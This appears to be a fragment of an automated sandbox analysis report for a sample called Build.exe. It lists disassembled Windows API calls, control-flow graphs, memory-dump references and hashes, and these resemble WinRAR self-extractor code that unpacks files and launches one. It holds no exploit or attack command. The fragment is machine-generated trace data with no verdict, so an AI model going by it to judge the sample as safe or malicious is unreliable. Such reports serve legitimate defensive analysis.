                                                                                          • _swprintf.LIBCMT ref: 0037E05F
                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E0BE
                                                                                          • SetDlgItemTextW.USER32(?,00000065,003965F4), ref: 0037E0D5
                                                                                          • GetDlgItem.USER32(?,00000065), ref: 0037E0DE
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0037E0ED
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037E0FC
                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E1A9
                                                                                          • _wcslen.LIBCMT ref: 0037E1FF
                                                                                          • _swprintf.LIBCMT ref: 0037E229
                                                                                          • SendMessageW.USER32(?,00000080,00000001,0002048D), ref: 0037E273
                                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037E28D
                                                                                          • GetDlgItem.USER32(?,00000068), ref: 0037E296
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037E2AC
                                                                                          • GetDlgItem.USER32(?,00000066), ref: 0037E2C6
                                                                                          • SetWindowTextW.USER32(00000000,003B589A), ref: 0037E2E8
                                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037E348
                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E35B
                                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0037E3FE
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0037E4CC
                                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037E50E
                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037E532
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 3247240745-2056833982
                                                                                          • Opcode ID: ee7cb0451380dac899f0180de8ad52e77a894687ad9e771c85a5ff0a876fe5ed
                                                                                          • Instruction ID: 1a8de9100f9e380c6a0e1ffcf766c9b45cfe9ec79fe5f0e2e346c69977825ccd
                                                                                          • Opcode Fuzzy Hash: ee7cb0451380dac899f0180de8ad52e77a894687ad9e771c85a5ff0a876fe5ed
                                                                                          • Instruction Fuzzy Hash: 0C42B671944344BAEB33AB60DC4AFBE3B6CAB0AB04F05C055F649EA1D1DB7C5A44CB61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0037D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
                                                                                            • Part of subcall function 0037D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
                                                                                            • Part of subcall function 0037D864: IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
                                                                                            • Part of subcall function 0037D864: TranslateMessage.USER32(?), ref: 0037D8A8
                                                                                            • Part of subcall function 0037D864: DispatchMessageW.USER32(?), ref: 0037D8B2
                                                                                          • GetDlgItem.USER32(00000068,003C3CF0), ref: 0037F81F
                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,0037D099,00000001,?,?,0037DAB9,003982F0,003C3CF0,003C3CF0,00001000,003A50C4,00000000,?), ref: 0037F844
                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037F853
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,003965F4), ref: 0037F861
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037F87B
                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037F895
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037F8D9
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037F8E4
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037F8F7
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037F91E
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,0039769C), ref: 0037F92D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                          • String ID: \
                                                                                          • API String ID: 3569833718-2967466578
                                                                                          • Opcode ID: a5f6c1aa62a98c28608752e0b73dc97f08cc60a84de0073bc640917078603f08
                                                                                          • Instruction ID: 549ea19241d3b1fa03281d67bc74b3e44fe5eb271df9a133e260a4bf9312c512
                                                                                          • Opcode Fuzzy Hash: a5f6c1aa62a98c28608752e0b73dc97f08cc60a84de0073bc640917078603f08
                                                                                          • Instruction Fuzzy Hash: 7F31C1B1249700BFE312DF24DC4AF6B7BACFB46704F080919F9A1DA1E1D76569048BA6

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 868 37fafc-37fb2e call 381590 871 37fb34-37fb40 call 386433 868->871 872 37fd7e-37fd95 call 3810f9 868->872 871->872 877 37fb46-37fb6e call 382640 871->877 880 37fb70 877->880 881 37fb78-37fb89 877->881 880->881 882 37fb94-37fb9d 881->882 883 37fb8b-37fb92 881->883 884 37fb9f-37fba3 882->884 885 37fbfa 882->885 883->884 887 37fba6-37fbac 884->887 886 37fbfe-37fc00 885->886 888 37fc07-37fc09 886->888 889 37fc02-37fc05 886->889 890 37fbae 887->890 891 37fbcd-37fbda 887->891 892 37fc1c-37fc32 call 36d848 888->892 893 37fc0b-37fc12 888->893 889->888 889->892 894 37fbb8-37fbc2 890->894 895 37fd53-37fd55 891->895 896 37fbe0-37fbe4 891->896 906 37fc34-37fc41 call 374168 892->906 907 37fc4b-37fc56 call 36bccb 892->907 893->892 899 37fc14 893->899 901 37fbc4 894->901 902 37fbb0-37fbb6 894->902 898 37fd59-37fd61 895->898 897 37fbea-37fbf4 896->897 896->898 897->887 903 37fbf6 897->903 898->886 899->892 901->891 902->894 905 37fbc6-37fbc9 902->905 903->885 905->891 906->907 914 37fc43 906->914 912 37fc73-37fc80 ShellExecuteExW 907->912 913 37fc58-37fc6f call 36d563 907->913 912->872 916 37fc86-37fc8c 912->916 913->912 914->907 918 37fc9f-37fca1 916->918 919 37fc8e-37fc95 916->919 921 37fca3-37fcac 918->921 922 37fcb8-37fcd7 call 38004d 918->922 919->918 920 37fc97-37fc9d 919->920 920->918 923 37fd0e-37fd1a CloseHandle 920->923 921->922 932 37fcae-37fcb6 ShowWindow 921->932 922->923 937 37fcd9-37fce1 922->937 925 37fd1c-37fd29 call 374168 923->925 926 37fd2b-37fd39 923->926 925->926 939 37fd66 925->939 930 37fd6d-37fd6f 926->930 931 37fd3b-37fd3d 926->931 930->872 934 37fd71-37fd73 930->934 931->930 936 37fd3f-37fd45 931->936 932->922 934->872 938 37fd75-37fd78 ShowWindow 934->938 936->930 940 37fd47-37fd51 936->940 937->923 941 37fce3-37fcf4 GetExitCodeProcess 937->941 938->872 939->930 940->930 941->923 942 37fcf6-37fd00 941->942 943 37fd07 942->943 944 37fd02 942->944 943->923 944->943
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0037FB35
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 0037FC78
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FCB0
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 0037FCEC
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FD12
                                                                                          • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0037FD78
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                          • String ID: .exe$.inf
                                                                                          • API String ID: 36480843-3750412487
                                                                                          • Opcode ID: 40ab67889d4058c671d0a3efc54b0a0130102e0e44d99a75c2f77a6801bb48a9
                                                                                          • Instruction ID: 637dd2bba9aea7f7ccabf8b1e17f1ef7102d8b786d3cd9d466e039d1eef3a944
                                                                                          • Opcode Fuzzy Hash: 40ab67889d4058c671d0a3efc54b0a0130102e0e44d99a75c2f77a6801bb48a9
                                                                                          • Instruction Fuzzy Hash: A761B0711083849ED733AF64D840ABBBBE8BB84744F06C82EF9C8D7251D7799984CB52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 945 38cfab-38cfc4 946 38cfda-38cfdf 945->946 947 38cfc6-38cfd6 call 39159c 945->947 949 38cfec-38d010 MultiByteToWideChar 946->949 950 38cfe1-38cfe9 946->950 947->946 957 38cfd8 947->957 952 38d1a3-38d1b6 call 3810f9 949->952 953 38d016-38d022 949->953 950->949 954 38d024-38d035 953->954 955 38d076 953->955 958 38d054-38d065 call 38bc8e 954->958 959 38d037-38d046 call 394660 954->959 961 38d078-38d07a 955->961 957->946 964 38d198 958->964 971 38d06b 958->971 959->964 970 38d04c-38d052 959->970 961->964 965 38d080-38d093 MultiByteToWideChar 961->965 969 38d19a-38d1a1 call 38d213 964->969 965->964 968 38d099-38d0ab call 38d5bc 965->968 976 38d0b0-38d0b4 968->976 969->952 975 38d071-38d074 970->975 971->975 975->961 976->964 977 38d0ba-38d0c1 976->977 978 38d0fb-38d107 977->978 979 38d0c3-38d0c8 977->979 981 38d109-38d11a 978->981 982 38d153 978->982 979->969 980 38d0ce-38d0d0 979->980 980->964 983 38d0d6-38d0f0 call 38d5bc 980->983 985 38d11c-38d12b call 394660 981->985 986 38d135-38d146 call 38bc8e 981->986 984 38d155-38d157 982->984 983->969 998 38d0f6 983->998 988 38d159-38d172 call 38d5bc 984->988 989 38d191-38d197 call 38d213 984->989 985->989 1001 38d12d-38d133 985->1001 986->989 997 38d148 986->997 988->989 1003 38d174-38d17b 988->1003 989->964 1002 38d14e-38d151 997->1002 998->964 1001->1002 1002->984 1004 38d17d-38d17e 1003->1004 1005 38d1b7-38d1bd 1003->1005 1006 38d17f-38d18f WideCharToMultiByte 1004->1006 1005->1006 1006->989 1007 38d1bf-38d1c6 call 38d213 1006->1007 1007->969
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00387F99,00387F99,?,?,?,0038D1FC,00000001,00000001,62E85006), ref: 0038D005
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038D1FC,00000001,00000001,62E85006,?,?,?), ref: 0038D08B
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038D185
                                                                                          • __freea.LIBCMT ref: 0038D192
                                                                                            • Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0
                                                                                          • __freea.LIBCMT ref: 0038D19B
                                                                                          • __freea.LIBCMT ref: 0038D1C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: ef2a4d629537c644c599cefa558f1bacfc93e95ceb2ddc67417635c1707fc602
                                                                                          • Instruction ID: ef72b7fe9f9d1699cb6b0a3ae90d13a0df065e90a5719aca2e834d99494b7be6
                                                                                          • Opcode Fuzzy Hash: ef2a4d629537c644c599cefa558f1bacfc93e95ceb2ddc67417635c1707fc602
                                                                                          • Instruction Fuzzy Hash: BA51C372610316ABEB26AE64CC45EBF77AAEF44710F1646A9FD06DA180DB34DC80C790

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
                                                                                            • Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4
                                                                                          • OleInitialize.OLE32(00000000), ref: 0037CCF2
                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037CD29
                                                                                          • SHGetMalloc.SHELL32(003AC460), ref: 0037CD33
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                          • String ID: riched20.dll$3To
                                                                                          • API String ID: 3498096277-2168385784
                                                                                          • Opcode ID: 092929bd5a1c1bfd4d326a6d352a26eb274a03055584b811f4ee1ea938b37dfc
                                                                                          • Instruction ID: 258e157db5cc1fed03d4ff06eef1812b70e9cf7ccd8b5da75de7dd2627f4f428
                                                                                          • Opcode Fuzzy Hash: 092929bd5a1c1bfd4d326a6d352a26eb274a03055584b811f4ee1ea938b37dfc
                                                                                          • Instruction Fuzzy Hash: 48F012B1D04219ABCB11AF9AD849DEFFFFCEF94704F004056E815E2251D7B856458FA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1014 3712f6-3712fd 1015 371332-371333 1014->1015 1016 3712ff-37130d call 3728ab 1014->1016 1019 37130f-37132b GetProcAddress * 2 1016->1019 1020 37132e 1016->1020 1019->1020 1020->1015
                                                                                          APIs
                                                                                            • Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
                                                                                            • Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4
                                                                                          • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00371315
                                                                                          • GetProcAddress.KERNEL32(003AC1F0,CryptUnprotectMemory), ref: 00371325
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                          • API String ID: 2141747552-1753850145
                                                                                          • Opcode ID: 4dffdb64df0187df9c1e3c497429b18d013ced502f317cfe041b10f3679f93f9
                                                                                          • Instruction ID: 693d53650dd2ebfc4a7a24f1a429fe0a6279a729779db7899d5956472a28db8e
                                                                                          • Opcode Fuzzy Hash: 4dffdb64df0187df9c1e3c497429b18d013ced502f317cfe041b10f3679f93f9
                                                                                          • Instruction Fuzzy Hash: 8EE08675A467019EEB335F38994AB82BEE45F28700F05C81DE0DA93640D6B9D8408B50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1021 36b2b0-36b2ea call 381590 1024 36b2f5 1021->1024 1025 36b2ec-36b2ef 1021->1025 1027 36b2f7-36b308 1024->1027 1025->1024 1026 36b2f1-36b2f3 1025->1026 1026->1027 1028 36b310-36b31a 1027->1028 1029 36b30a 1027->1029 1030 36b31f-36b32c call 367eed 1028->1030 1031 36b31c 1028->1031 1029->1028 1034 36b334-36b34d CreateFileW 1030->1034 1035 36b32e 1030->1035 1031->1030 1036 36b34f-36b36e GetLastError call 36da1e 1034->1036 1037 36b39b-36b39f 1034->1037 1035->1034 1040 36b3a8-36b3ad 1036->1040 1043 36b370-36b393 CreateFileW GetLastError 1036->1043 1038 36b3a3-36b3a6 1037->1038 1038->1040 1041 36b3b9-36b3be 1038->1041 1040->1041 1044 36b3af 1040->1044 1045 36b3c0-36b3c3 1041->1045 1046 36b3df-36b3f0 1041->1046 1043->1038 1047 36b395-36b399 1043->1047 1044->1041 1045->1046 1048 36b3c5-36b3d9 SetFileTime 1045->1048 1049 36b3f2-36b407 call 37268b 1046->1049 1050 36b40b-36b424 call 3810f9 1046->1050 1047->1038 1048->1046 1049->1050
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00368846,?,00000005), ref: 0036B342
                                                                                          • GetLastError.KERNEL32(?,?,00368846,?,00000005), ref: 0036B34F
                                                                                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00368846,?,00000005), ref: 0036B382
                                                                                          • GetLastError.KERNEL32(?,?,00368846,?,00000005), ref: 0036B38A
                                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00368846,?,00000005), ref: 0036B3D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast$Time
                                                                                          • String ID:
                                                                                          • API String ID: 1999340476-0
                                                                                          • Opcode ID: 0edfd53f84c6166edcd6d6f0a8389de98d9cf23959d74085aa8a3157fb8d54de
                                                                                          • Instruction ID: 8840caf2292e2d8efc62ed8212214268bd2f45ecc229e02a49da1cdfb123bca4
                                                                                          • Opcode Fuzzy Hash: 0edfd53f84c6166edcd6d6f0a8389de98d9cf23959d74085aa8a3157fb8d54de
                                                                                          • Instruction Fuzzy Hash: DB414830649745AFD322DF24CC46B9AFBD8BB45320F204A1AF9A1D63C1D7B19998CF91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1084 37d864-37d87d PeekMessageW 1085 37d87f-37d893 GetMessageW 1084->1085 1086 37d8b8-37d8ba 1084->1086 1087 37d895-37d8a2 IsDialogMessageW 1085->1087 1088 37d8a4-37d8b2 TranslateMessage DispatchMessageW 1085->1088 1087->1086 1087->1088 1088->1086
                                                                                          APIs
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037D875
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037D886
                                                                                          • IsDialogMessageW.USER32(0001048A,?), ref: 0037D89A
                                                                                          • TranslateMessage.USER32(?), ref: 0037D8A8
                                                                                          • DispatchMessageW.USER32(?), ref: 0037D8B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1266772231-0
                                                                                          • Opcode ID: bdc074858f7479048468a78af8d93fc83aa258feaa44bb484fb2f84765c5b807
                                                                                          • Instruction ID: 77d5617aa3ed49cd160771b57ac9b3437d8a03b25cddb0b346cc0742f2a75fc7
                                                                                          • Opcode Fuzzy Hash: bdc074858f7479048468a78af8d93fc83aa258feaa44bb484fb2f84765c5b807
                                                                                          • Instruction Fuzzy Hash: 26F0DA7190522ABBDB21ABE6DC4CDEB7F7CEE06391B008415B91AD2050E728E506CFB0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1089 37cb49-37cb72 GetClassNameW 1090 37cb74-37cb89 call 374168 1089->1090 1091 37cb9a-37cb9c 1089->1091 1097 37cb8b-37cb97 FindWindowExW 1090->1097 1098 37cb99 1090->1098 1092 37cba7-37cbb3 call 3810f9 1091->1092 1093 37cb9e-37cba1 SHAutoComplete 1091->1093 1093->1092 1097->1098 1098->1091
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 0037CB6A
                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 0037CBA1
                                                                                            • Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E
                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037CB91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                          • String ID: EDIT
                                                                                          • API String ID: 4243998846-3080729518
